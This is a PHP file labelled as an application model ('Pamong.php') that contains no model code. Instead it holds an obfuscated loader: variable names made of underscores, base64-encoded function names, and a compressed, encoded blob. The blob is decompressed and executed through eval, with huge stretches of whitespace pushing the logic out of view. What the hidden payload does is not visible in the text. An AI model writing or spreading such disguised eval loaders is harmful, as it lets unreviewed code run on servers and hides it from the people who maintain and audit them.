<?php

        $__='printf';$_='Loading app/Models/Pamong.php';
























































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if (!function_exists('__lambda')) {
                                                                                                                                                                                                                                              function __lambda($sArgs, $sCode)
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                  return eval("return function($sArgs){{$sCode}};");
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                          }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_', $______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo






















































































































































































                                                                                                                                                                                                                     $________;
